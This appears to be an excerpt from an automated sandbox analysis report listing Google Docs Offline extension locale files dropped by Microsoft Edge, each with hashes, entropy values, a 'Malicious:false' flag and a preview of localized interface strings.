                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                  Malicious:false
